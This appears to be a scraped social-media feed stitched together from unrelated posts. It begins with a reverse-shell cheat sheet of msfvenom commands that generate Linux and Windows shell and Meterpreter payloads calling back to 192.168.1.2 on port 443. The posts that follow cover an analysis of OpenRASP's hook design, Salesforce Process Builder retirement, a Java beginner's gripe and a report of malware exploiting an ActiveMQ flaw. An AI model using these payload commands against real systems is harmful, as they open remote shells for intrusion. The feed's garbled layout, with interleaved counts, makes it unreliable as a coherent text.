windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f aspx -o reverse.aspx msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f aspx -o reverse.aspx Linux Payloads Listener Netcat **x86 - Shell:** bash msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf **x64 - 
Shell:** bash msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf Listener Metasploit Multi Handler **x86 - Meterpreter:** bash msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf **x64 - Meterpreter:** bash msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf **x86 - Shell:** bash msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf **x64 - Shell:** bash msfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf Windows Payloads Listener Netcat **x86 - Shell:** bash msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe **x64 - Shell:** bash msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe Listener Metasploit Multi Handler **x86 - Meterpreter:** bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe **x64 - Meterpreter:** bash msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe **x86 - Shell:** bash msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe **x64 - Shell:** bash msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe ████████████████████████
1
17
113,257
28 Apr 2024
#OpenSourceCodeAnalysis A note on what I learned today from analyzing the OpenRASP code (this is the ancestor of domestic RASP products in China):
- Agent.java:
  - premain(): loads the Agent when the Java program starts, or attaches to an already-running Java process, and executes the init method (so that code can be woven in).
  - agentmain(): uses the Java Instrumentation mechanism to attach to an already-running Java process and executes the init method (so that code can be woven in).
- HttpAppender.java:
  - Implements a log-upload Appender used to upload log information to the cloud (e.g. S3, SLS).
- KeepAlive.java:
  - Creates a heartbeat thread that keeps the connection between the local RASP (Runtime Application Self-Protection) and the cloud control center alive.
- Register.java:
  - The code registers the RASP agent with the cloud-based service, providing the necessary information about the agent, such as its ID, version, hostname, operating system, language and other environment details.
- detector directory (scan rules, used for collecting component supply-chain information):
  - DubboDetector.java: checks whether the class name matches Dubbo's GenericFilter class; if so, writes a log entry and marks it as Dubbo.
  - Others such as Jetty, resin etc. work the same way.
- hook directory (scan rules, used for function interception and identification):
  - DubboPreRequestHook.java: this code defines a hook point for Dubbo request pre-processing. Dubbo is a popular open-source RPC framework; this hook allows requests to be intercepted and processed before they are sent to the Dubbo framework.
  - The other files are the same: code can be planted before functions such as file operations.
  - The 2 commonly used kinds of interception:
    - Intercepting a class: the `hookMethod` method is responsible for modifying the behavior of the matched class.
    - Intercepting a method: the `hookMethod` method is responsible for modifying the behavior of the matched class.
  - Security vulnerability interception, taking XXE as an example:
    - Check whether the class name matches: in the `isClassMatched` method, check whether the current class name is "org/dom4j/io/SAXReader"; if so, proceed to the next step. Hook method: in the `hookMethod` method, SAXReader's read method is hooked and a piece of code is inserted before it to set Dom4j's XXE entity. Setting the XXE entity: in the `setFeature` method, check whether the hook is enabled for the current thread and whether the current action is BLOCK_XXE_DISABLE_ENTITY; if the conditions are met, use reflection to call the reader's setFeature method to disable the XXE entity. Error handling: if an error occurs while disabling the XXE entity, a warning is logged.
  - Security vulnerability interception, taking RCE as an example: the `ProcessBuilderHook` class extends `AbstractClassHook` and overrides several methods to hook into the `ProcessBuilder` class; the `isClassMatched` method checks, depending on the Java version and operating system, whether the current class is `java/lang/ProcessImpl` or `java/lang/UNIXProcess`. The `hookMethod` method injects a call to the `checkCommand` method before the `ProcessBuilder` class is initialized. The checkCommand method extracts command information, including command arguments and environment variables, from the byte[] or String[] parameters. The extracted command information is then passed to another `checkCommand` method, which inspects it. The final "checkCommand" method builds a parameter map from the extracted command information and performs the check using the "HookHandler.doCheckWithoutRequest" method.
- The open-source project also contains a RASP for PHP (mainly implemented in .cc) and a RASP-cloud implementation (mainly implemented in golang), omitted here.
Open-source address: github.com/baidu/openrasp
1
1
6
1,761
Salesforce has announced a significant change to its automation tools: The end of support for Workflow Rules and Process Builder starting December 31, 2025. Customers are urged to switch their automation to Salesforce Flow.🧵 #flow #automation #processbuilder #salesforce
1
1
2
283
The newest #TheFlowArchitect is live! Earlier this week, Salesforce highlighted the end of support for #WorkflowRules and #ProcessBuilder. In this post I discuss what this means for #AwesomeAdmins. #Salesforce #Trailblazers #TrailblazerCommunity #Flow #Flownatics #GoWithTheFlow
1
2
5
276
Replying to @tsoding
I am a beginner programmer, and the fact that you have to make a new ProcessBuilder object, then manually call the inheritIO function and then call start is cursed. Why can't they just... C?
2
522
21 Nov 2023
The Kinsing malware group is exploiting the Apache ActiveMQ remote code execution vulnerability (CVE-2023-46604) to plant rootkits, according to a Trend Micro report. Via "ProcessBuilder", a malicious bash script downloads additional payloads. bleepingcomputer.com/news/se…
2
6
1,013